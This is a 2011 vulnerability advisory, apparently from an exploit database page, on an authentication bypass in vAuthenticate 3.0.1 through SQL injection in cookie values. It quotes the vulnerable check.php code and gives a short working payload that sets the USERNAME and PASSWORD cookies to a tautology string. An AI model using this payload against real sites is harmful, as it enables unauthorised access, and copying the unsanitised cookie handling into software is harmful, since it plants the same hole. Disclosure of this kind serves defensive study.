vAuthenticate 3.0.1 SQL Injection

2011-08-30 / 2011-08-31
Credit: bd0rk
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

----------------------------------------------------------------------- vAuthenticate 3.0.1 Auth Bypass by Cookie SQL Injection Vulnerability ----------------------------------------------------------------------- Author: bd0rk Contact: bd0rk[at]hackermail.com Date: 2011 / 08 / 30 MEZ-Time: 01:35 Tested on WinVista & Ubuntu-Linux Affected-Software: vAuthenticate 3.0.1 Vendor: http://www.beanbug.net/vScripts.php Download: http://www.beanbug.net/Scripts/vAuthenticate_3.0.1.zip +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Found vulnerable code in check.php: if (isset($_COOKIE['USERNAME']) && isset($_COOKIE['PASSWORD'])) { // Get values from superglobal variables $USERNAME = $_COOKIE['USERNAME']; $PASSWORD = $_COOKIE['PASSWORD']; $CheckSecurity = new auth(); $check = $CheckSecurity->page_check($USERNAME, $PASSWORD); } else { $check = false; } if ($check == false) { ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Exploit: javascript:document.cookie = "[USERNAME]=' or '; [PATH]"; javascript:document.cookie = "[PASSWORD]=' or '; [PATH]"; Them use login.php 4AuthBypass :P ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ---Greetings from hot Germany, the 22 years old bd0rk. :-) Special-Greetz: Zubair Anjum, Perle, DJTrebo, Anonymous, GolD_M, hoohead


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top